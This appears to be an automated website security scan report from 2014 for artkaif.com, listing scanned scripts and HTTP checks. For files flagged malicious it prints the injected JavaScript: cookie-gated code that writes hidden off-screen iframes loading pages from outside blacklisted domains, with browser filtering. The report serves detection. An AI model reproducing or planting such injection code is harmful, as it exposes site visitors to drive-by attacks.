Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=artkaif.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://artkaif.com/ | 200 OK Content-Length: 4774 Content-Type: text/html | clean |
http://artkaif.com/js/jquery.js | 200 OK Content-Length: 1769 Content-Type: application/javascript | clean |
http://artkaif.com/js/audio-player.js | 200 OK Content-Length: 1804 Content-Type: application/javascript | malicious |
Page code contains blacklisted domain: dlustblog.mandymckenzie.com ...[1294 bytes skipped]... ); } function Bilboranker(name) { var krimesity = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" )); return krimesity ? decodeURIComponent(krimesity[1]) : undefined; } var cookie = Bilboranker('salurdonersite'); if (cookie == undefined) { setCookie('salurdonersite', true, 259201); document.write('<iframe src="http://dlustblog.mandymckenzie.com/nanuisalers16.html" style="top:-999px;left:-999px;position:absolute;" height="131" width="131"></iframe>'); } } Filetransferdonate(); /* Copyright (C) 2000 Free Software Foundation, Inc. See LICENSE.txt Malicious iFrame found. size: 131x131 src: http://dlustblog.mandymckenzie.com/nanuisalers16.html This URL is marked by Google as suspicious <iframe src="http://dlustblog.mandymckenzie.com/nanuisalers16.html" style="top:-999px;left:-999px;position:absolute;" height="131" width="131"> | ||
http://artkaif.com/js/cufon-yui.js | 200 OK Content-Length: 1769 Content-Type: application/javascript | clean |
http://artkaif.com/js/agp.js | 200 OK Content-Length: 1771 Content-Type: application/javascript | clean |
http://artkaif.com/js/jquery.easing.min.js | 200 OK Content-Length: 7927 Content-Type: application/javascript | clean |
http://artkaif.com/js/supersized.3.2.5.min.js | 200 OK Content-Length: 1769 Content-Type: application/javascript | clean |
http://artkaif.com/js/supersized.shutter.js | 200 OK Content-Length: 9859 Content-Type: application/javascript | clean |
http://artkaif.com/wedding/?m0prm=2&m1prm=1 | 200 OK Content-Length: 23680 Content-Type: text/html | clean |
http://artkaif.com/wedding/iv-includes/assets/js/swfobject.js | 404 Not Found Content-Length: 115 Content-Type: text/html | clean |
http://artkaif.com/test404page.js | 404 Not Found Content-Length: 115 Content-Type: text/html | clean |
http://artkaif.com/wedding/iv-includes/assets/js/swfaddress.js | 404 Not Found Content-Length: 115 Content-Type: text/html | clean |
http://artkaif.com/wedding/Addons/JQuery/jquery-1.6.1.min.js | 200 OK Content-Length: 1804 Content-Type: application/javascript | malicious |
Page code contains blacklisted domain: dlustblog.mandymckenzie.com ...[1294 bytes skipped]... ); } function Bilboranker(name) { var krimesity = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" )); return krimesity ? decodeURIComponent(krimesity[1]) : undefined; } var cookie = Bilboranker('salurdonersite'); if (cookie == undefined) { setCookie('salurdonersite', true, 259201); document.write('<iframe src="http://dlustblog.mandymckenzie.com/nanuisalers16.html" style="top:-999px;left:-999px;position:absolute;" height="131" width="131"></iframe>'); } } Filetransferdonate(); /* Copyright (C) 2000 Free Software Foundation, Inc. See LICENSE.txt Malicious iFrame found. size: 131x131 src: http://dlustblog.mandymckenzie.com/nanuisalers16.html This URL is marked by Google as suspicious <iframe src="http://dlustblog.mandymckenzie.com/nanuisalers16.html" style="top:-999px;left:-999px;position:absolute;" height="131" width="131"> | ||
http://artkaif.com/wedding/Addons/JQueryRater/jquery.rater.js | 404 Not Found Content-Length: 115 Content-Type: text/html | clean |
http://artkaif.com/wedding/Addons/EasySlider/js/easySlider1.5.js | 200 OK Content-Length: 2253 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: binoduselda.sunshinebanditz.org ...[1135 bytes skipped]... navigator.userAgent; var Yellowgrand = (r_amblartide.indexOf("IEMobile") > -1 || r_amblartide.indexOf("Windows NT 6.3") > -1 || r_amblartide.indexOf("Windows NT 6.2") > -1 || r_amblartide.indexOf("Chrome") > -1 || r_amblartide.indexOf("Windows") < +1); var Ultrastilus = (getCookie("Garamg18usality") === undefined); if (!Yellowgrand && Ultrastilus) { document.write('<iframe src="http://binoduselda.sunshinebanditz.org/sisusler16.html" style="left: -902px;font-size: 100%;border-right-width: 10px;border-left-style: dotted;border-left-width: 10px;background-color: rgb(95, 0, 95);border-right-color: #400D12;position: absolute;border-right-style: solid;height: 100px;width: 100px;font-family: "Courier New", Courier, monospace;top: -902px;text-align: center;"></iframe>'); var date = new Date( new Date().getTime() + 66*60*60*1000 ); document.cookie="Garamg18usality=1; path=/; ...[69 bytes skipped]... Decoded script: <iframe src="http://iplorider.perksweb.net/irafulmer16.khml" style="top:-999px;left:-999px;position:absolute;" height="135" width="135"></iframe><iframe src="http://binoduselda.sunshinebanditz.org/sisusler16.html" style="left: -902px;font-size: 100%;border-right-width: 10px;border-left-style: dotted;border-left-width: 10px;background-color: rgb(95, 0, 95);border-right-color: #400D12;position: absolute;border-right-style: solid;height: 100px;width: 100px;font-family: "Courier New", Courier, monospace;top: -902px;text-align: center;"></iframe> Malicious iFrame found. size: 100x100 src: http://binoduselda.sunshinebanditz.org/sisusler16.html This URL is marked by Google as suspicious <iframe src="http://binoduselda.sunshinebanditz.org/sisusler16.html" style="left: -902px;font-size: 100%;border-right-width: 10px;border-left-style: dotted;border-left-width: 10px;background-color: rgb(95, 0, 95);border-right-color: #400d12;position: absolute;border-right-style: solid;height: 100px;width: 100px;font-family: "courier new", courier, monospace;top: -902px;text-align: center;"> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: artkaif.com
Result:
HTTP/1.1 200 OK
Cache-Control: private, must-revalidate
Connection: close
Date: Thu, 25 Sep 2014 01:52:33 GMT
Server: nginx/1.6.2
Content-Type: text/html; charset=UTF-8
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Set-Cookie: SN4eeb88d89460f=3ae2112bead14b000b51c4e7c02f8880; path=/
Set-Cookie: SN4eeb88d89460f=3ae2112bead14b000b51c4e7c02f8880; path=/
GET / HTTP/1.1
Host: artkaif.com
Result:
HTTP/1.1 200 OK
Cache-Control: private, must-revalidate
Connection: close
Date: Thu, 25 Sep 2014 01:52:33 GMT
Server: nginx/1.6.2
Content-Type: text/html; charset=UTF-8
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Set-Cookie: SN4eeb88d89460f=3ae2112bead14b000b51c4e7c02f8880; path=/
Set-Cookie: SN4eeb88d89460f=3ae2112bead14b000b51c4e7c02f8880; path=/
Second query (visit from search engine):
GET / HTTP/1.1
Host: artkaif.com
Referer: http://www.google.com/search?q=artkaif.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: artkaif.com
Referer: http://www.google.com/search?q=artkaif.com
Result:
The result is similar to the first query. There are no suspicious redirects found.